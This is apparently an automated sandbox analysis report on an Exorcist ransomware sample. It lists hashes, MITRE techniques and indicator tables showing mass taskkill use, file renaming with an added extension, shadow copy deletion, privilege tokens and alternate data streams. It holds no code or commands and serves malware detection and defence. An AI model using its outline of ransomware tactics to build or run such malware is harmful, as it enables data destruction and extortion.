exorcist | a7e27cc38a39ff242da39d05e04b95ea9b656829dfe2e90e8226351da8813d7d

Analysis

max time kernel
119s
max time network
149s
platform
windows10_x64
resource
win10
submitted
24-07-2020 12:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7e415d5a1b1235491cb698eb14817d31.exe
Size

43KB
MD5

7e415d5a1b1235491cb698eb14817d31
SHA1

ca1a94c1be4e51da577e51957428263ca9c0c0ab
SHA256

a7e27cc38a39ff242da39d05e04b95ea9b656829dfe2e90e8226351da8813d7d
SHA512

6c97b54c6b9d7e82f9be371773ffdafa2fbd59b967d4597e737f3b4249215c662403d3f0f8e3527c129334105ff4ce46397b1aed8d4f4ff49a8032b50bc01303

Score

10^/10

ransomware exorcist persistence

Malware Config

Signatures

Kills process with taskkill 87 IoCs

evasion

pid	Process
3832	taskkill.exe
1096	taskkill.exe
3688	taskkill.exe
2220	taskkill.exe
3724	taskkill.exe
2152	taskkill.exe
2104	taskkill.exe
3796	taskkill.exe
3828	taskkill.exe
2656	taskkill.exe
3876	taskkill.exe
2104	taskkill.exe
3980	taskkill.exe
2664	taskkill.exe
3820	taskkill.exe
776	taskkill.exe
1956	taskkill.exe
796	taskkill.exe
1264	taskkill.exe
1264	taskkill.exe
1096	taskkill.exe
1452	taskkill.exe
2920	taskkill.exe
1336	taskkill.exe
1172	taskkill.exe
508	taskkill.exe
2324	taskkill.exe
2172	taskkill.exe
692	taskkill.exe
3412	taskkill.exe
3832	taskkill.exe
2420	taskkill.exe
416	taskkill.exe
2428	taskkill.exe
2320	taskkill.exe
1264	taskkill.exe
2784	taskkill.exe
2320	taskkill.exe
488	taskkill.exe
1280	taskkill.exe
3832	taskkill.exe
3980	taskkill.exe
2904	taskkill.exe
972	taskkill.exe
2116	taskkill.exe
2664	taskkill.exe
1288	taskkill.exe
2152	taskkill.exe
1288	taskkill.exe
1004	taskkill.exe
540	taskkill.exe
3456	taskkill.exe
2980	taskkill.exe
2784	taskkill.exe
1288	taskkill.exe
416	taskkill.exe
2564	taskkill.exe
1096	taskkill.exe
972	taskkill.exe
344	taskkill.exe
3948	taskkill.exe
2116	taskkill.exe
2420	taskkill.exe
3980	taskkill.exe
2324	taskkill.exe
2784	taskkill.exe
3832	taskkill.exe
2152	taskkill.exe
1264	taskkill.exe
576	taskkill.exe
1828	taskkill.exe
1676	taskkill.exe
1464	taskkill.exe
1288	taskkill.exe
3576	taskkill.exe
2172	taskkill.exe
2664	taskkill.exe
2420	taskkill.exe
2116	taskkill.exe
2664	taskkill.exe
2420	taskkill.exe
2784	taskkill.exe
3736	taskkill.exe
3728	taskkill.exe
1252	taskkill.exe
1268	taskkill.exe
748	taskkill.exe

Modifies extensions of user files 11 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\CompressDebug.png => C:\Users\Admin\Pictures\CompressDebug.png.gUgnZf	7e415d5a1b1235491cb698eb14817d31.exe
File opened for modification	C:\Users\Admin\Pictures\StartProtect.tiff	7e415d5a1b1235491cb698eb14817d31.exe
File renamed	C:\Users\Admin\Pictures\StartProtect.tiff => C:\Users\Admin\Pictures\StartProtect.tiff.gUgnZf	7e415d5a1b1235491cb698eb14817d31.exe
File opened for modification	C:\Users\Admin\Pictures\StartProtect.tiff.gUgnZf	7e415d5a1b1235491cb698eb14817d31.exe
File renamed	C:\Users\Admin\Pictures\UnlockDismount.raw => C:\Users\Admin\Pictures\UnlockDismount.raw.gUgnZf	7e415d5a1b1235491cb698eb14817d31.exe
File renamed	C:\Users\Admin\Pictures\ClearWatch.png => C:\Users\Admin\Pictures\ClearWatch.png.gUgnZf	7e415d5a1b1235491cb698eb14817d31.exe
File opened for modification	C:\Users\Admin\Pictures\CompressDebug.png.gUgnZf	7e415d5a1b1235491cb698eb14817d31.exe
File renamed	C:\Users\Admin\Pictures\RepairSave.crw => C:\Users\Admin\Pictures\RepairSave.crw.gUgnZf	7e415d5a1b1235491cb698eb14817d31.exe
File opened for modification	C:\Users\Admin\Pictures\RepairSave.crw.gUgnZf	7e415d5a1b1235491cb698eb14817d31.exe
File opened for modification	C:\Users\Admin\Pictures\UnlockDismount.raw.gUgnZf	7e415d5a1b1235491cb698eb14817d31.exe
File opened for modification	C:\Users\Admin\Pictures\ClearWatch.png.gUgnZf	7e415d5a1b1235491cb698eb14817d31.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
796	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 266 IoCs

pid	Process
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe
3720	7e415d5a1b1235491cb698eb14817d31.exe

Suspicious use of AdjustPrivilegeToken 129 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	3828	WMIC.exe
Token: SeSecurityPrivilege	3828	WMIC.exe
Token: SeTakeOwnershipPrivilege	3828	WMIC.exe
Token: SeLoadDriverPrivilege	3828	WMIC.exe
Token: SeSystemProfilePrivilege	3828	WMIC.exe
Token: SeSystemtimePrivilege	3828	WMIC.exe
Token: SeProfSingleProcessPrivilege	3828	WMIC.exe
Token: SeIncBasePriorityPrivilege	3828	WMIC.exe
Token: SeCreatePagefilePrivilege	3828	WMIC.exe
Token: SeBackupPrivilege	3828	WMIC.exe
Token: SeRestorePrivilege	3828	WMIC.exe
Token: SeShutdownPrivilege	3828	WMIC.exe
Token: SeDebugPrivilege	3828	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3828	WMIC.exe
Token: SeRemoteShutdownPrivilege	3828	WMIC.exe
Token: SeUndockPrivilege	3828	WMIC.exe
Token: SeManageVolumePrivilege	3828	WMIC.exe
Token: 33	3828	WMIC.exe
Token: 34	3828	WMIC.exe
Token: 35	3828	WMIC.exe
Token: 36	3828	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3828	WMIC.exe
Token: SeSecurityPrivilege	3828	WMIC.exe
Token: SeTakeOwnershipPrivilege	3828	WMIC.exe
Token: SeLoadDriverPrivilege	3828	WMIC.exe
Token: SeSystemProfilePrivilege	3828	WMIC.exe
Token: SeSystemtimePrivilege	3828	WMIC.exe
Token: SeProfSingleProcessPrivilege	3828	WMIC.exe
Token: SeIncBasePriorityPrivilege	3828	WMIC.exe
Token: SeCreatePagefilePrivilege	3828	WMIC.exe
Token: SeBackupPrivilege	3828	WMIC.exe
Token: SeRestorePrivilege	3828	WMIC.exe
Token: SeShutdownPrivilege	3828	WMIC.exe
Token: SeDebugPrivilege	3828	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3828	WMIC.exe
Token: SeRemoteShutdownPrivilege	3828	WMIC.exe
Token: SeUndockPrivilege	3828	WMIC.exe
Token: SeManageVolumePrivilege	3828	WMIC.exe
Token: 33	3828	WMIC.exe
Token: 34	3828	WMIC.exe
Token: 35	3828	WMIC.exe
Token: 36	3828	WMIC.exe
Token: SeBackupPrivilege	3332	vssvc.exe
Token: SeRestorePrivilege	3332	vssvc.exe
Token: SeAuditPrivilege	3332	vssvc.exe
Token: SeDebugPrivilege	3736	taskkill.exe
Token: SeDebugPrivilege	3820	taskkill.exe
Token: SeDebugPrivilege	1004	taskkill.exe
Token: SeDebugPrivilege	2320	taskkill.exe
Token: SeDebugPrivilege	2172	taskkill.exe
Token: SeDebugPrivilege	576	taskkill.exe
Token: SeDebugPrivilege	416	taskkill.exe
Token: SeDebugPrivilege	972	taskkill.exe
Token: SeDebugPrivilege	2564	taskkill.exe
Token: SeDebugPrivilege	3728	taskkill.exe
Token: SeDebugPrivilege	776	taskkill.exe
Token: SeDebugPrivilege	1452	taskkill.exe
Token: SeDebugPrivilege	692	taskkill.exe
Token: SeDebugPrivilege	3576	taskkill.exe
Token: SeDebugPrivilege	416	taskkill.exe
Token: SeDebugPrivilege	3412	taskkill.exe
Token: SeDebugPrivilege	1828	taskkill.exe
Token: SeDebugPrivilege	1252	taskkill.exe
Token: SeDebugPrivilege	2920	taskkill.exe
Token: SeDebugPrivilege	1956	taskkill.exe
Token: SeDebugPrivilege	3688	taskkill.exe
Token: SeDebugPrivilege	2172	taskkill.exe
Token: SeDebugPrivilege	540	taskkill.exe
Token: SeDebugPrivilege	2220	taskkill.exe
Token: SeDebugPrivilege	1676	taskkill.exe
Token: SeDebugPrivilege	3796	taskkill.exe
Token: SeDebugPrivilege	2980	taskkill.exe
Token: SeDebugPrivilege	1336	taskkill.exe
Token: SeDebugPrivilege	1464	taskkill.exe
Token: SeDebugPrivilege	796	taskkill.exe
Token: SeDebugPrivilege	488	taskkill.exe
Token: SeDebugPrivilege	3876	taskkill.exe
Token: SeDebugPrivilege	3724	taskkill.exe
Token: SeDebugPrivilege	1172	taskkill.exe
Token: SeDebugPrivilege	2428	taskkill.exe
Token: SeDebugPrivilege	1268	taskkill.exe
Token: SeDebugPrivilege	2320	taskkill.exe
Token: SeDebugPrivilege	1280	taskkill.exe
Token: SeDebugPrivilege	344	taskkill.exe
Token: SeDebugPrivilege	2904	taskkill.exe
Token: SeDebugPrivilege	3948	taskkill.exe
Token: SeDebugPrivilege	748	taskkill.exe
Token: SeDebugPrivilege	508	taskkill.exe
Token: SeDebugPrivilege	972	taskkill.exe
Token: SeDebugPrivilege	1264	taskkill.exe
Token: SeDebugPrivilege	2420	taskkill.exe
Token: SeDebugPrivilege	3832	taskkill.exe
Token: SeDebugPrivilege	1288	taskkill.exe
Token: SeDebugPrivilege	2664	taskkill.exe
Token: SeDebugPrivilege	2104	taskkill.exe
Token: SeDebugPrivilege	2784	taskkill.exe
Token: SeDebugPrivilege	3980	taskkill.exe
Token: SeDebugPrivilege	2116	taskkill.exe
Token: SeDebugPrivilege	2152	taskkill.exe
Token: SeDebugPrivilege	1096	taskkill.exe
Token: SeDebugPrivilege	1264	taskkill.exe
Token: SeDebugPrivilege	2420	taskkill.exe
Token: SeDebugPrivilege	3832	taskkill.exe
Token: SeDebugPrivilege	1288	taskkill.exe
Token: SeDebugPrivilege	2664	taskkill.exe
Token: SeDebugPrivilege	2104	taskkill.exe
Token: SeDebugPrivilege	2784	taskkill.exe
Token: SeDebugPrivilege	3980	taskkill.exe
Token: SeDebugPrivilege	2116	taskkill.exe
Token: SeDebugPrivilege	2152	taskkill.exe
Token: SeDebugPrivilege	1096	taskkill.exe
Token: SeDebugPrivilege	1264	taskkill.exe
Token: SeDebugPrivilege	2420	taskkill.exe
Token: SeDebugPrivilege	3832	taskkill.exe
Token: SeDebugPrivilege	1288	taskkill.exe
Token: SeDebugPrivilege	2664	taskkill.exe
Token: SeDebugPrivilege	2324	taskkill.exe
Token: SeDebugPrivilege	2784	taskkill.exe
Token: SeDebugPrivilege	3980	taskkill.exe
Token: SeDebugPrivilege	2116	taskkill.exe
Token: SeDebugPrivilege	2152	taskkill.exe
Token: SeDebugPrivilege	1096	taskkill.exe
Token: SeDebugPrivilege	1264	taskkill.exe
Token: SeDebugPrivilege	2420	taskkill.exe
Token: SeDebugPrivilege	3832	taskkill.exe
Token: SeDebugPrivilege	1288	taskkill.exe
Token: SeDebugPrivilege	2664	taskkill.exe
Token: SeDebugPrivilege	2324	taskkill.exe
Token: SeDebugPrivilege	2784	taskkill.exe

NTFS ADS 5 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\boot.sys:fvridclnn	7e415d5a1b1235491cb698eb14817d31.exe
File created	C:\Users\Admin\AppData\Local\Temp\boot.sys:qszpymvdszkkeiaw	7e415d5a1b1235491cb698eb14817d31.exe
File created	C:\Users\Admin\AppData\Local\Temp\boot.sys:fvridclnn	7e415d5a1b1235491cb698eb14817d31.exe
File created	C:\Users\Admin\AppData\Local\Temp\boot.sys:qpgzqdhrezueflgcu	7e415d5a1b1235491cb698eb14817d31.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\boot.sys:bjjhhsydsppbf	7e415d5a1b1235491cb698eb14817d31.exe

Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082
Exorcist
Ransomware-as-a-service which avoids infecting machines in CIS nations. First seen in mid-2020.
ransomware exorcist

Suspicious use of WriteProcessMemory 552 IoCs

description	pid	Process	procid_target
PID 3720 wrote to memory of 4004	3720	7e415d5a1b1235491cb698eb14817d31.exe	68
PID 3720 wrote to memory of 4004	3720	7e415d5a1b1235491cb698eb14817d31.exe	68
PID 3720 wrote to memory of 4004	3720	7e415d5a1b1235491cb698eb14817d31.exe	68
PID 4004 wrote to memory of 3828	4004	cmd.exe	70
PID 4004 wrote to memory of 3828	4004	cmd.exe	70
PID 4004 wrote to memory of 3828	4004	cmd.exe	70
PID 3720 wrote to memory of 3224	3720	7e415d5a1b1235491cb698eb14817d31.exe	73
PID 3720 wrote to memory of 3224	3720	7e415d5a1b1235491cb698eb14817d31.exe	73
PID 3720 wrote to memory of 3224	3720	7e415d5a1b1235491cb698eb14817d31.exe	73
PID 3720 wrote to memory of 3292	3720	7e415d5a1b1235491cb698eb14817d31.exe	75
PID 3720 wrote to memory of 3292	3720	7e415d5a1b1235491cb698eb14817d31.exe	75
PID 3720 wrote to memory of 3292	3720	7e415d5a1b1235491cb698eb14817d31.exe	75
PID 3720 wrote to memory of 4072	3720	7e415d5a1b1235491cb698eb14817d31.exe	77
PID 3720 wrote to memory of 4072	3720	7e415d5a1b1235491cb698eb14817d31.exe	77
PID 3720 wrote to memory of 4072	3720	7e415d5a1b1235491cb698eb14817d31.exe	77
PID 3720 wrote to memory of 3028	3720	7e415d5a1b1235491cb698eb14817d31.exe	79
PID 3720 wrote to memory of 3028	3720	7e415d5a1b1235491cb698eb14817d31.exe	79
PID 3720 wrote to memory of 3028	3720	7e415d5a1b1235491cb698eb14817d31.exe	79
PID 3720 wrote to memory of 3612	3720	7e415d5a1b1235491cb698eb14817d31.exe	81
PID 3720 wrote to memory of 3612	3720	7e415d5a1b1235491cb698eb14817d31.exe	81
PID 3720 wrote to memory of 3612	3720	7e415d5a1b1235491cb698eb14817d31.exe	81
PID 3612 wrote to memory of 796	3612	cmd.exe	83
PID 3612 wrote to memory of 796	3612	cmd.exe	83
PID 3612 wrote to memory of 796	3612	cmd.exe	83
PID 3720 wrote to memory of 748	3720	7e415d5a1b1235491cb698eb14817d31.exe	84
PID 3720 wrote to memory of 748	3720	7e415d5a1b1235491cb698eb14817d31.exe	84
PID 3720 wrote to memory of 748	3720	7e415d5a1b1235491cb698eb14817d31.exe	84
PID 3720 wrote to memory of 3724	3720	7e415d5a1b1235491cb698eb14817d31.exe	86
PID 3720 wrote to memory of 3724	3720	7e415d5a1b1235491cb698eb14817d31.exe	86
PID 3720 wrote to memory of 3724	3720	7e415d5a1b1235491cb698eb14817d31.exe	86
PID 3724 wrote to memory of 3736	3724	cmd.exe	88
